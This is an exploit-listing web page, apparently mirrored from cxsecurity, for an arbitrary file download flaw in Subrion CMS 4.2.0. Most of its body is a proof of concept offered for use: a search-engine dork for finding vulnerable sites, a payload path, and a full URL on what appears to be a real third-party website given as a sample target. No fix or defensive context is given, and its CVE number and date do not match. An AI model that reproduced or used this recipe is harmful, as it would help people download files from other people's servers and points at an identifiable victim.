Advertisement






Subrion cms 4.2.0 Arbitrary File Download Vulnerability

CVE Category Price Severity
CVE-2021-44611 CWE-22 Not specified High
Author Risk Exploitation Type Date
Unkown High Remote 2019-02-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020181

Below is a copy:

Subrion cms 4.2.0 Arbitrary File Download Vulnerability
====================================================================================================================================
| # Title     : Subrion cms 4.2.0 Arbitrary File Download Vulnerability                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : https://subrion.org/                                                                                               |  
| # Dork      : "  2019 Powered by Subrion CMS "                                                                                  |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : install/install/download/

[+] http://wing.ro/cmim/install/install/download/

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.